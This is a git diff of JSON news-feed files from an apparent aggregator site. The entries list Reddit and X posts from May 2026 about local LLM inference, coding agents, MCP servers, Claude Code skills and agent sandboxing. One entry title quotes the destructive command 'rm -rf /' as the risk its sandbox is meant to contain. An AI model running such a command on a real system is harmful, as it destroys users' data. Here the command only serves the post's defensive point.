Verify on the ground with wifi physically off. If it works in airplane mode at home, it works at 10 km in the sky. Where I got it wrong: I prepped qwen2.5-coder:14b first because it's the model everyone recommends in local-LLM threads. On the flight, it choked on Claude Code's tool loop; one call took 25 seconds, another took 52. For a workflow that chains five or six tool calls per task, that's unusable. Switched mid-flight to gemma4:26b (which I'd pulled as a backup). Different category of model, RL-trained for tool use, not just code completion. The tool loop ran at a usable speed. The gap analysis I was running on a…", - "category": "ai_tools" - }, - { - "title": "Removing Vision from model", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tlhkts/removing_vision_from_model/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "agent_tool" - ], - "matching_tags": [ - "agent_tool" - ], - "importance": 1, - "date": "2026-05-23T14:11:59.000Z", - "summary": "I removed mmproj file from models to remove vision and save my vram. But just curious, is this really don't affect its text ability? 
I use Qwen 3.6 35b a3b by unsloth and mainly use for agentic coding", - "category": "ai_models" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-05-24.json b/data/news-feed-2026-05-24.json deleted file mode 100644 index 7c26aec..0000000 --- a/data/news-feed-2026-05-24.json +++ /dev/null @@ -1,269 +0,0 @@ -{ - "generated": "2026-06-05T00:44:43.107Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-05-24", - "article_count": 15, - "archived_story_count": 365, - "articles": [ - { - "title": "I built a local GUI for the TradingAgents framework — works with Ollama", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tm2ct0/i_built_a_local_gui_for_the_tradingagents/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "open_source", - "developer_tool", - "cli_tool", - "tool_update" - ], - "matching_tags": [ - "open_source", - "developer_tool", - "cli_tool", - "tool_update" - ], - "importance": 1, - "date": "2026-05-24T04:51:09.000Z", - "summary": "https://preview.redd.it/i90oxxk7n03h1.png?width=1898&format=png&auto=webp&s=7d219c804fda7dfe122b84fcdb6d0d6883818c68 A while back I came across [TradingAgents](https://github.com/TauricResearch/TradingAgents) — a really cool multi-agent LLM stock analysis framework where like a dozen \"agents\" (market analyst, news analyst, bull researcher, bear researcher, risk team, etc.) debate a stock and produce a final trade recommendation. The output is genuinely interesting to read. Problem: it ships as a CLI. You pick options in a terminal, watch logs scroll, then go hunt for markdown files on disk. The reports are good, the experience of getting to them isn't. So I forked it and bolted on a web GUI. Runs locally, talks to whatever LLM provider you have a key for (OpenAI, Anthropic, Google, OpenRouter, DeepSeek, Ollama, xAI, Qwen, GLM, MiniMax). All Apache 2.0. 
Some things I ended up adding because I wanted them: * Live pipeline visualization showing which agent is working * Reports tab with a 3-pane reader, table-of-contents, search * A \"report length\" knob (Concise / Standard / Comprehensive) — concise mode saves \\~50% tokens * Multi-session chat where you can pin past report…", - "category": "ai_models" - }, - { - "title": "VRAM Suite: early pre-alpha tool for VRAM diagnostics, bounded CUDA probing, and OOM risk estimation", - "url": "https://reddit.com/r/StableDiffusion/comments/1tmixth/vram_suite_early_prealpha_tool_for_vram/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "api_update", - "developer_tool", - "cli_tool" - ], - "matching_tags": [ - "api_update", - "developer_tool", - "cli_tool" - ], - "importance": 0.9400000000000001, - "date": "2026-05-24T17:45:15.000Z", - "summary": "# I started building VRAM Suite — a small framework for VRAM diagnostics in local AI workflows Hi. I wanted to share a small pre-alpha project I started building: \\*\\*VRAM Suite\\*\\*. The basic idea is simple: local AI workflows often fail with CUDA OOM only after everything has already started. I got tired of guessing how much VRAM is actually usable, so I started writing a small Python framework to inspect, record, and later predict VRAM behavior. It is still early, but the current version already has a working foundation. 
# What works now * CLI command: \\`vramsuite doctor\\` * Public Python API: \\`import vramsuite\\` * Structured doctor API: \\`run\\_doctor()\\` * System/runtime fingerprinting * Optional PyTorch/CUDA detection * NVIDIA GPU memory reading through NVML using \\`ctypes\\` * Driver-level total/free/used VRAM without requiring PyTorch * \\`.vramcard\\` JSON profile format * Rich terminal report output * Optional bounded CUDA allocation probe through PyTorch * Basic OOM risk estimation using \\`--estimate-mb\\` # Example `uv run vramsuite doctor --probe --probe-max-mb 12288 --probe-step-mb 256 --probe-free-floor-mb 2048 --estimate-mb 8000` # Example output summary from my RTX 50…", - "category": "creative_tools" - }, - { - "title": "Claude working autonomously", - "url": "https://reddit.com/r/ClaudeAI/comments/1tm9gm5/claude_working_autonomously/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "mcp", - "developer_tool" - ], - "matching_tags": [ - "api_update", - "mcp", - "developer_tool" - ], - "importance": 0.8600000000000001, - "date": "2026-05-24T11:21:02.000Z", - "summary": "Goodmorning, Has anyone figure out how to configure Claude so that it runs autonomously, almost like Openclaw? I wanted to figure out if it could just autonomously respond to LinkedIn messages and reach out on my behalf? 
I know i can do this within cowork with mcp servers and tools but didn’t know if managed agents or the SDK would be my best option to try and create this full system", - "category": "ai_tools" - }, - { - "title": "Agent Zero CLI Update Signals Computer Use Polish For Agent Frameworks", - "url": "https://x.com/alessandro_a0/status/2058278886572433812", - "source": "Aligned News (Scoble)", - "tags": [ - "cli_tool", - "agent_tool" - ], - "matching_tags": [ - "cli_tool", - "agent_tool" - ], - "importance": 1, - "date": "2026-05-24T18:23:11.433Z", - "summary": "A current post says A0 CLI v1.11 and Agent Zero v1.17 are live after a Computer Use announcement.", - "category": "ai_tools" - }, - { - "title": "Working on a cgo-free CUDA binding in Go for ML stuff Week 3 - open source [P]", - "url": "https://reddit.com/r/MachineLearning/comments/1tmb4qw/working_on_a_cgofree_cuda_binding_in_go_for_ml/", - "source": "Reddit r/MachineLearning", - "tags": [ - "api_update", - "open_source" - ], - "matching_tags": [ - "api_update", - "open_source" - ], - "importance": 1, - "date": "2026-05-24T12:41:07.000Z", - "summary": "At our work we use CUDA in Rust since the company switched to it recently. Rust has pretty good Driver API bindings but it made me wonder why the hell we cant have something decent in Go without cgo. I mostly build ML tools in the last month and Go is my main language for pretty much everything. Problem is most Go CUDA projects still need cgo and the full toolkit at build time. That breaks cross compilation and makes Docker images huge which sucks when working on machine learning projects. So last month I started messing around with a proof of concept that loads [libcuda.so](http://libcuda.so) at runtime using purego. No cgo at all. Biggest pain was thread affinity. CUDA keeps context per thread so goroutines switching around kept breaking things. I built a simple executor that locks an OS thread with runtime.LockOSThread and funnels all calls through a channel. 
Heres roughly what using it looks like right now: func run() error { cuda.Init() dev, _ := cuda.GetDevice(0) ctx, _ := dev.Primary() defer ctx.Close() a, _ := cuda.Alloc[float32](ctx, 1024) b, _ := cuda.Alloc[float32](ctx, 1024) c, _ := cuda.Alloc[float32](ctx, 1024) stream, _ := ctx.NewStream() start, _ := ctx.NewEvent()…", - "category": "ai_research" - }, - { - "title": "PapersWithCode new features - week 1 [P]", - "url": "https://reddit.com/r/MachineLearning/comments/1tmawv5/paperswithcode_new_features_week_1_p/", - "source": "Reddit r/MachineLearning", - "tags": [ - "open_source", - "tool_update" - ], - "matching_tags": [ - "open_source", - "tool_update" - ], - "importance": 1, - "date": "2026-05-24T12:31:12.000Z", - "summary": "Hi, Niels here from the open-source team at Hugging Face. It's been one week since I [launched](https://www.reddit.com/r/MachineLearning/comments/1tgmwqr/reviving_paperswithcode_by_hugging_face_p/) [paperswithcode.co](http://paperswithcode.co), a revival of the website we all loved. It allows us to keep track of the state-of-the-art (SOTA) across various domains of AI, from agents to computer vision and time-series forecasting. The reception has been great, and I'm excited to extend this over the next few months. This week, I've added the following features: \\- Support for multiple metrics for a given benchmark: leaderboards now support multiple metrics, see e.g., the [Open ASR Leaderboard](https://paperswithcode.co/benchmark/open-asr-leaderboard) for automatic speech recognition, which supports both Word Error Rate (WER) and the Inverse Real-Time Factor (RTFx) metrics, or the [Object Detection leaderboard](https://paperswithcode.co/benchmark/coco-val2017), which now also reports frames-per-second (FPS) besides mean average precision (mAP) on COCO. 
https://preview.redd.it/owlxn0b5u23h1.png?width=2878&format=png&auto=webp&s=1dff2f8feab4f160f77c97ceeb5d90e82382e63c \\- Su…", - "category": "ai_research" - }, - { - "title": "Qwen Plays ̶p̶̶o̶̶k̶̶e̶̶m̶̶o̶̶n̶ ? / QWEN PLAYS DCSS! - qwen3.6-35b-a3b@q4_k_xl plays open source roguelike adventure DCSS (and does a decent job)", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tm9nx3/qwen_plays_pokemon_qwen_plays_dcss_qwen3635ba3bq4/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "open_source", - "cli_tool" - ], - "matching_tags": [ - "open_source", - "cli_tool" - ], - "importance": 1, - "date": "2026-05-24T11:31:24.000Z", - "summary": "Hi, (TLDR.): Qwen in its MTP version has tool call bugs and outputs everything into tool/thinking blocks - mangeling the output - canceling the +speed with repeated wrong tool calls! DCSS works well with non MTP qwen even on smaller qwants. im Testing the new MTP models and thought the Hermes plays pokemon skill would be fun to test - expecting codex doing a good job and Qwen at least being able to navigate etc - but after a little research it looks like all LLM (even the big ones) cant play pokemon without hickups - so i tried to find a game the LLM can play - to use it as benchmarks - all the numbers from the official benchmarks are a nice indicator but i wanted real tests - after tons of IMG research and push to telegram etc - palying games seemed the next step to test - Qwen can play DCSS in its qwen3.6-35b-a3b@q4\\_k\\_xl NON MTP VERSION pretty well! in a Terminal you can see/control if needed! - telegram text update + ascii/screenshots on milestones or errors \\- MTP version produced mangeled tool calls! (240k context/8koutput token, 0,6 temp/20topK, 1Rep. penalty, 1.5 pres. penalty, 0.95 topP) LM studio on 5090 if anyone is interested in the skill / prompt i can upload it late…", - "category": "ai_models" - }, - { - "title": "How I do use the recent llama.cpp native tools to do web rag a.k.a. 
web_fetch (or anything else for the matter) directly from inside the llama-server's webui", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tm93ng/how_i_do_use_the_recent_llamacpp_native_tools_to/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "cli_tool", - "agent_tool" - ], - "matching_tags": [ - "cli_tool", - "agent_tool" - ], - "importance": 1, - "date": "2026-05-24T11:02:32.000Z", - "summary": "As some other fellow lllmers I've discovered few days ago that the amazing llama.cpp project has just added native tools functionalities into the server. After having enabled the relative options into llama-server and played a bit with the most harmless of them all, get\\_datetime, I've bit the bullet and cautiously enabled the big boss: exec\\_shell\\_command. Building upon my recent sandboxing efforts relative to pi coding agent, another fantastic tool, I implemented this workflow to more safely use it into linux by multi-sandboxing: step 0) enabled llama-server options for native tools step 1) install firejail system wide step 2) create a new linux user called vmagents (a.k.a. 
\"virtual machine agent smith\") to prevent escalation or messing up with my own user workspace home dir step 3) login into vmagents user and install smolmachines, an easy to use OCI virtual machine containers harness step 4) create a VM called minivm and start it to pull in a bare bones busybox commands based Alpine linux OCI image step 5) create the script minivm-exec (and make it executable) into vmagents exec dir to spinup the sandbox VM, exec a given command into it into further firejail sandbox, turn it…", - "category": "ai_models" - }, - { - "title": "48 frontends for Comfy!", - "url": "https://reddit.com/r/StableDiffusion/comments/1tm25k8/48_frontends_for_comfy/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "api_update", - "tool_update" - ], - "matching_tags": [ - "api_update", - "tool_update" - ], - "importance": 1, - "date": "2026-05-24T04:40:33.000Z", - "summary": "This is an update of the list that I made 5 months ago. [4 months ago it was 26](https://www.reddit.com/r/StableDiffusion/comments/1qyrw4z/26_frontends_for_comfy/). Many of UIs were suggested by user iwr-redmond. Below is list with only names; links, descriptions are in the awesome list itself on github: [https://github.com/light-and-ray/awesome-alternative-uis-for-comfyui](https://github.com/light-and-ray/awesome-alternative-uis-for-comfyui) Category 1: Close integration, work with the same workflows 1. SwarmUI 2. Minimalistic Comfy Wrapper WebUI 3. Open Creative Studio for ComfyUI 4. ComfyUI Mobile Frontend 5. ComfyMobileUI 6. ComfyChair 7. ComfyScript 8. WorkflowUI 9. FlowScale AIOS 10. ComfyUI-Workflow-Studio 11. Promptus CosyUI Category 2: UI for workflows exported in API format 1. ViewComfy 2. ComfyUI Mini 3. Generative AI for Krita (Krita AI diffusion) 4. Intel AI Playground 5. Comfy App (ComfyUIMobileApp) 6. ComfyUI Workflow Hub 7. Mycraft 8. ComfyUI WebUI Generator 9. Nexa - Your On-the-Go ComfyUI Companion 10. CivitDeck 11. ComfyUI Skills for OpenClaw 12. 
ComfyUI\\_bsk\\_UI 13. OutSweeper 14. Orange Category 3: Use Comfy UI as runner server (worklows made by developers) 1.…", - "category": "creative_tools" - }, - { - "title": "🚀 Skills for small businesses, officially released by Anthropic", - "url": "https://reddit.com/r/ClaudeAI/comments/1tm94ai/skills_for_small_businesses_officially_released/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "developer_tool", - "agent_tool" - ], - "matching_tags": [ - "developer_tool", - "agent_tool" - ], - "importance": 0.8600000000000001, - "date": "2026-05-24T11:03:28.000Z", - "summary": "Anthropic’s 31 small-business skills reportedly hit around 382,000 downloads on day one. And now someone has mapped the whole thing into a setup workflow that can apparently be deployed in \\~10 minutes. This is actually a pretty interesting shift. Small businesses used to stitch together automations manually across: Zapier Notion CRM tools email workflows internal docs custom scripts Now AI companies are starting to package the whole thing into reusable skill packs: 🧠 workflow 📚 memory ⚙️ behavior 🔗 connectors 🤖 orchestration 📋 operating rules Basically: business operations as AI-readable skill files. The best part? You don’t necessarily need Claude to use them. At the core, these are still .md skill files describing workflows for AI agents. So even if you’re using Codex, Cursor, Gemini, or another coding agent, you can still study the structure, adapt the workflows, and plug the ideas into your own agent setup. 
This feels like the beginning of a new category: “AI business operating templates.” GitHub: https://github.com/anthropics/knowledge-work-plugins", - "category": "ai_tools" - }, - { - "title": "Claude code - Cultivate your context window to get the max out of your tokens", - "url": "https://reddit.com/r/ClaudeAI/comments/1tm594m/claude_code_cultivate_your_context_window_to_get/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "mcp" - ], - "matching_tags": [ - "api_update", - "mcp" - ], - "importance": 0.8600000000000001, - "date": "2026-05-24T07:27:11.000Z", - "summary": "Many times during the start of the session or when you have cleared or compacted the session, claude tends to read the entire codebase resulting in context window bloating. if your repo is large and/or if you are working with multiple repos it means your context window will have a lot of stuff which are not really relevant for the feature work that you are doing rn. Instead of claude having to read the entire codebase you have a map of your repos at different granularity and guide claude using [claude.md](http://claude.md) file to read the map. this helps claude get the context better without the context window bloating. if you are working on typescript/javascript based repos you can check what i built here in this repo: [https://github.com/justinjamesmathew/tokenmax-mcp](https://github.com/justinjamesmathew/tokenmax-mcp) the idea is to have three tiers of structural context loaded at three different times. The Registry is a small directory of every repo that is registered, with a short paragraph for each covering what it does, what stack it uses, where it lives, and when it was last indexed. 
It loads automatically into every Claude Code session via \\~/.claude/[CLAUDE.md](http://c…", - "category": "ai_tools" - }, - { - "title": "LongCat-Video-Avatar 1.5 Release", - "url": "https://reddit.com/r/StableDiffusion/comments/1tm5oxh/longcatvideoavatar_15_release/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "open_source", - "developer_tool" - ], - "matching_tags": [ - "open_source", - "developer_tool" - ], - "importance": 0.78, - "date": "2026-05-24T07:52:12.000Z", - "summary": "HuggingFace Link: [meituan-longcat/LongCat-Video-Avatar-1.5 · Hugging Face](https://huggingface.co/meituan-longcat/LongCat-Video-Avatar-1.5) LongCat-Video-Avatar 1.5, an upgraded open-source framework that prioritizes extreme empirical optimization and production-readiness for audio-driven human video generation. Built upon the LongCat-Video foundation model, v1.5 delivers highly stable, commercial-grade avatar video synthesis supporting native tasks including Audio-Text-to-Video (AT2V), Audio-Text-Image-to-Video (ATI2V), and Video Continuation, with seamless compatibility for both single-stream and multi-stream audio inputs. # [](https://huggingface.co/meituan-longcat/LongCat-Video-Avatar-1.5#key-features)Key Features * 🌟 **Upgraded Audio Encoder (Whisper-Large):**: Replaces Wav2Vec2 with Whisper-Large, yielding significantly smoother and more natural lip dynamics. * 🌟 **Production-Ready Stability**: Achieves accurate lip-synchronization, full-body temporal stability, and robust long-video generation with strict identity consistency. 
* 🌟 **Stylized Domain Generalization**: Robustly generalizes to anime, animals, and complex real-world conditions such as multi-person interactio…", - "category": "creative_tools" - }, - { - "title": "Claude records demo videos for me now", - "url": "https://reddit.com/r/ClaudeAI/comments/1tmkee4/claude_records_demo_videos_for_me_now/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "open_source", - "tool_update" - ], - "matching_tags": [ - "open_source", - "tool_update" - ], - "importance": 0.62, - "date": "2026-05-24T18:38:15.000Z", - "summary": "I hate recording demo videos, so I made an open source skill for it: [https://github.com/MobAI-App/desktop-recorder-skill](https://github.com/MobAI-App/desktop-recorder-skill) Now I can give Claude a prompt like: Record a short demo of this app flow And it handles the annoying parts for me: preparing the app state, clicking through the flow, recording, adding cursor/click effects and captions, then exporting the video. So instead of spending time setting everything up and recording the same demo manually, I can let Claude do it while I work on something else. It also has Remotion integration, so Claude can generate more polished and editable videos from the recording, not just raw screen captures. The video attached to this post is the result of the skill itself. 
Also working on the same idea for mobile apps: [https://github.com/MobAI-App/mobile-recorder-skill](https://github.com/MobAI-App/mobile-recorder-skill)", - "category": "ai_tools" - }, - { - "title": "hipEngine: Fast Native Qwen 3.6 Inference for RDNA3 (Strix Halo, 7900 XTX)", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tmq4s6/hipengine_fast_native_qwen_36_inference_for_rdna3/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-05-24T22:21:21.000Z", - "summary": "A few weeks ago, after finishing [FastDMS](https://www.reddit.com/r/LocalLLaMA/comments/1t3vlrx/fastdms_64x_kvcache_compression_running_faster/), I started toying around writing some RDNA3 kernels again to see how fast I could get Qwen 3.6 MoE running. It turned out well enough, so over the past couple weeks, I turned those experiments into [hipEngine](https://github.com/shisa-ai/hipEngine), a new open source (AGPLv3) ROCm-native local LLM inference engine. It's Python based, but with no heavy PyTorch dependency. All the hot-path is HIP/C++, making liberal use of AMD native libs like hipBLASLt, hipGraph, AOTriton, etc. 
### gfx1100 (Radeon RX 7900 XTX / Radeon Pro W7900) The initial implementation has Qwen 3.6 (MoE and dense) running competitively with llama.cpp, with the [ParoQuant](https://github.com/shisa-ai/paroquant) (which I've also ported to be ROCm compatible) 4.68bpw having better c=1 prefill (\"prompt processing\") at every tested context length, from 512-128K on gfx1100 (W7900/7900 XTX): ### Prefill tok/s | Workload | hipEngine PARO | hipEngine GGUF Q4_K_S | llama.cpp HIP | llama.cpp Vulkan | | --- | ---: | ---: | ---: | ---: | | 512/128 | **2718.497** | 2258.847 | 2436.04…", - "category": "ai_models" - }, - { - "title": "MergeNB: An intuitive merge conflict resolver built for Jupyter notebooks in VS Code [P]", - "url": "https://reddit.com/r/MachineLearning/comments/1tmq1eb/mergenb_an_intuitive_merge_conflict_resolver/", - "source": "Reddit r/MachineLearning", - "tags": [ - "developer_tool" - ], - "matching_tags": [ - "developer_tool" - ], - "importance": 1, - "date": "2026-05-24T22:17:41.000Z", - "summary": "I used to work heavily with Jupyter Notebooks + git + VS Code in a collaborative research setting and found nbdime to be somewhat buggy/a hassle to work with in general. So, in typical side project fashion ([relevant xkcd](https://xkcd.com/1319/)) I've been working on MergeNB quite a bit over the last 6 months or so. It's (currently only) a VS Code extension with a web UI, and has a few cool improvements over other alternatives, which I outlined in the README/docs site. I'd be over the moon if this actually gets used by people, and would love a star if it's interesting. See [https://github.com/Avni2000/MergeNB](http://github.com/Avni2000/MergeNB). 
I've also been working on a static documentation site here: [https://avni2000.github.io/MergeNB/docs](https://avni2000.github.io/MergeNB/docs) I'm planning on working on it a lot more over the summer and properly fleshing out a few of the ideas I had (including making it a git mergetool as well as a VS Code extension), so if you'd like to contribute, feel free to raise an issue or shoot me a message/email :)", - "category": "ai_research" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-05-25.json b/data/news-feed-2026-05-25.json deleted file mode 100644 index 23b23d4..0000000 --- a/data/news-feed-2026-05-25.json +++ /dev/null @@ -1,279 +0,0 @@ -{ - "generated": "2026-06-05T00:44:43.508Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-05-25", - "article_count": 15, - "archived_story_count": 588, - "articles": [ - { - "title": "I made a local-first MCP tutorial repo with node-llama-cpp and a custom agent loop", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tn1jjy/i_made_a_localfirst_mcp_tutorial_repo_with/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update", - "mcp", - "developer_tool", - "cli_tool", - "tool_update" - ], - "matching_tags": [ - "api_update", - "mcp", - "developer_tool", - "cli_tool", - "tool_update" - ], - "importance": 1, - "date": "2026-05-25T07:14:17.000Z", - "summary": "I just published a repo called MCP from Scratch that teaches the Model Context Protocol by building it step by step in plain Node.js. Most of the repo is about understanding MCP itself, but the later modules may be relevant here: I added a local-first setup using `node-llama-cpp`, GGUF models, MCP sampling, and a custom plan -> act -> observe agent loop. 
So the repo goes from: * raw JSON-RPC and stdio transport * to a working MCP server with tools/resources/prompts * to local model integration * to an agent loop that uses MCP tools with a local GGUF model There’s also an optional LangChain example, but the main path is intentionally minimal and tries to make the underlying mechanics obvious. Key points: * plain Node.js, minimal abstractions * designed as a learning repo, not a production SDK * uses shared local GGUF models for the later modules * built for people who want to understand what MCP tooling is actually doing under the hood Repo: [https://github.com/pguso/mcp-from-scratch](https://github.com/pguso/mcp-from-scratch) Would especially love feedback from people here on the local inference side: * model choice * whether the agent loop examples feel useful or too toy-ish", - "category": "ai_models" - }, - { - "title": "I stress-tested Kimi K2.6 against Claude Opus 4.7 on a quick coding-agent task", - "url": "https://reddit.com/r/ClaudeAI/comments/1tn9fpq/i_stresstested_kimi_k26_against_claude_opus_47_on/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "open_source", - "tool_update", - "agent_tool" - ], - "matching_tags": [ - "api_update", - "open_source", - "tool_update", - "agent_tool" - ], - "importance": 1, - "date": "2026-05-25T13:37:21.000Z", - "summary": "I tested Claude Opus 4.7 and Kimi K2.6 on the same coding agent task i.e. build an AI Fix Runner that takes a broken repo, runs its tests, identifies the failure, applies a patch, reruns the test, and exposes the final diff/logs through an API and UI. The goal was not to benchmark syntax completion or simple repo edits. I wanted to test model behavior on a less familiar integration path: shifting execution from local processes into remote sandboxes. I used Tensorlake specifically because the sandbox API is newer and integration-heavy. 
This made the test more about whether the model could reason through unfamiliar infra and produce a working implementation. Setup: * Claude Opus 4.7 through Claude Code * Kimi K2.6 through OpenCode via OpenRouter Pricing context: * Claude Opus 4.7: $5/M input, $25/M output * Kimi K2.6: $0.95/M input ($0.16 cached input), $4/M output So, what made it interesting is if Kimi's lower cost can handle a crazy workflow. To be clear, comparing Kimi K2.6 directly with Opus 4.7 is not completely fair. The model classes, pricing, and expected capability levels are very different. I mainly wanted to see how far an open model could get on the same task at a fract…", - "category": "ai_tools" - }, - { - "title": "Workbench Launches Open Source BullMQ Dashboard For Node Backends", - "url": "https://x.com/pontusab/status/2058588422001029549", - "source": "Aligned News (Scoble)", - "tags": [ - "product_launch", - "open_source", - "tool_update" - ], - "matching_tags": [ - "product_launch", - "open_source", - "tool_update" - ], - "importance": 1, - "date": "2026-05-25T01:21:33.840Z", - "summary": "Workbench launched as an open-source BullMQ dashboard with flows, metrics, schedulers, and search for Node backends.", - "category": "ai_tools" - }, - { - "title": "Ditched GitHub Copilot yearly subscription. What's the best way to run Claude nowadays?", - "url": "https://reddit.com/r/ClaudeAI/comments/1tnl23a/ditched_github_copilot_yearly_subscription_whats/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "developer_tool", - "cli_tool" - ], - "matching_tags": [ - "api_update", - "developer_tool", - "cli_tool" - ], - "importance": 0.9400000000000001, - "date": "2026-05-25T20:34:06.000Z", - "summary": "Hey everyone, I recently cancelled my yearly GitHub Copilot subscription. My old workflow was simple: I used the GitHub Copilot extension in VS Code, but I swapped the backend model to Sonnet / Opus and relied heavily on the `/plan` command to code. 
I absolutely loved it and I would like that exact flow back. My plan was to just go full Bring Your Own Key (BYOK) inside VS Code using an API key and pay per token for Sonnet or Opus. However, I’m seeing all this hype around CLI tools, and it has me second-guessing my setup. I’m completely open to trying new workflows if they are a massive upgrade, but honestly, I’d be much happier just staying in my cozy VS Code environment if the math makes sense. so my questions are: 1. Is a flat Claude subscription actually cheaper than an API key for heavy coding? In my old copilot plan I believe just once I used all my tokens per month. 2. How bad is the token bleed if I stick to BYOK? I heard with CLI you make some markdown files and things get cheaper / faster. Can you do that with BYOK as well? thanks for any advice!", - "category": "ai_tools" - }, - { - "title": "I built a meme-y social feed for programmers that lives inside Claude Code (and Cursor, and Copilot CLI)", - "url": "https://reddit.com/r/ClaudeAI/comments/1tnlji5/i_built_a_memey_social_feed_for_programmers_that/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "developer_tool", - "cli_tool" - ], - "matching_tags": [ - "developer_tool", - "cli_tool" - ], - "importance": 1, - "date": "2026-05-25T20:52:25.000Z", - "summary": "I spend hours every day in Claude Code, but I started feeling weirdly isolated. So I built a tiny social network that lives inside it. WAYD (\"What Are You Doing?\") is a Claude Code skill. You type `/wayd` and either post a short \"vibe\" about your coding day or scroll a random feed of what other developers are losing their minds over. React with emojis, drop a one-line reply, get back to work. The whole thing runs on GitHub Issues as the silent backend. No server, no database, no signup, just your existing `gh` CLI. You never see issues, JSON, or `gh` commands; the skill orchestrates everything in the background. It feels like a tiny social app inside the terminal. 
8 vibe-tags to pick from when you post: 🤡 cursed-code, 🪦 rip-me, 🫠 brain-melt, 🧙 dark-arts, 🔥 hot-take, 💭 shower-thought, 🤔 existential, ☕ procrastinating. Each is a mood, not a topic. Write up to 1000 chars, publish under your real GitHub handle, scroll a random feed of strangers doing the same. **Install on Claude Code**: claude plugin marketplace add ferdinandobons/wayd claude plugin install wayd@wayd Other install methods + screenshots: [https://github.com/ferdinandobons/wayd](https://github.com/ferdinandobons…", - "category": "ai_tools" - }, - { - "title": "Is AI inference platform really that saturated now? [D]", - "url": "https://reddit.com/r/MachineLearning/comments/1tngk7p/is_ai_inference_platform_really_that_saturated/", - "source": "Reddit r/MachineLearning", - "tags": [ - "api_update", - "developer_tool" - ], - "matching_tags": [ - "api_update", - "developer_tool" - ], - "importance": 1, - "date": "2026-05-25T17:52:10.000Z", - "summary": "I’m thinking of expanding an on-device inference SDk into a full blown AI inference platform and seeing more and more inference platform popping out. Been talking with a VC from Seattle/NY. Is this space really that saturated?", - "category": "ai_research" - }, - { - "title": "Reconstructing the agent methodology: Decoupling decision-making and execution - open source [P]", - "url": "https://reddit.com/r/MachineLearning/comments/1tnfxsc/reconstructing_the_agent_methodology_decoupling/", - "source": "Reddit r/MachineLearning", - "tags": [ - "open_source", - "cli_tool" - ], - "matching_tags": [ - "open_source", - "cli_tool" - ], - "importance": 1, - "date": "2026-05-25T17:29:28.000Z", - "summary": "I’ve been thinking about a problem in current agent systems: Most agents are becoming very good at execution, but the decision layer before execution is still unclear. Coding agents, research agents, tool loops, sandboxes, workflows, and harnesses are all improving quickly. 
Once a human gives an intent, agents can often do a lot of useful work. But the higher-level question is still usually left to the user: What should happen next, and why? I’ve been exploring this idea through an open-source project called Spice. The simplest way to describe it is: Spice is a decision layer above agents. It is not trying to replace execution agents. Tools like Claude Code, Codex, Hermes, or other agents can still do the actual work. Instead, Spice sits before execution and tries to make the decision process explicit: - what was observed - what options were considered - why one option was selected - what trade-offs were rejected - whether execution needs approval - what happened afterward - how that outcome should affect the next decision The current runtime is still early, but it can already be installed, configured with an LLM provider, run in the terminal, inspect Decision Cards, and hand off…", - "category": "ai_research" - }, - { - "title": "I’m building an open-source decision layer above AI agents [P]", - "url": "https://reddit.com/r/MachineLearning/comments/1tndi8y/im_building_an_opensource_decision_layer_above_ai/", - "source": "Reddit r/MachineLearning", - "tags": [ - "open_source", - "cli_tool" - ], - "matching_tags": [ - "open_source", - "cli_tool" - ], - "importance": 1, - "date": "2026-05-25T16:03:36.000Z", - "summary": "Hi everyone, I’m Jia, the creator of Spice. I’ve been working on an open-source project called Spice. The simplest way to describe it is: Spice is a decision layer above agents. Most agent systems today are very focused on execution, They are getting better at doing tasks after a human gives them an intent. But the higher-level question is still usually left to the user: What should happen next, and why? That is the layer I want Spice to explore. Spice is not trying to replace execution agents. Tools like Claude Code, Codex, Hermes, or other agents can still do the actual work. 
Instead, Spice sits before execution and tries to make the decision process explicit: - what was observed - what options were considered - why one option was selected - what trade-offs were rejected - what happened afterward - how that outcome should affect the next decision The current runtime is still early, but you can already install it, set up an LLM provider, run it in the terminal, inspect Decision Cards, and hand off approved execution to external agents. My goal is to make agent behavior less of a black box. Instead of only seeing the final result of an agent task, I want to preserve the reasoning…", - "category": "ai_research" - }, - { - "title": "I built a computer use sandbox framework for codex on headless linux. GPU passthrough, computer use, and sudo access for codex all work. It's the perfect dev sandbox to allow full auto work while minimizing the \"rm -rf /\" risk", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tn3i55/i_built_a_computer_use_sandbox_framework_for/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "developer_tool", - "agent_tool" - ], - "matching_tags": [ - "developer_tool", - "agent_tool" - ], - "importance": 1, - "date": "2026-05-25T09:01:19.000Z", - "summary": "I've been working with agents for months now, and I haven't found a sandbox environment that \"just works\" so I built it! My requirements were as follows: 1. Agent is unable to destroy my host OS but able to install software and run sudo commands 2. Agent is able to browse the web autonomously and validate the UI it creates 3. GPU access works (even on DGX spark which cant pass through to 4. Docker works 5. Persistent environment I can setup once, log into my internet accounts I want the agent to access, copy in my .env files, install custom software etc. 6. Support multiple parallel browser use / development sessions concurrently 7. 
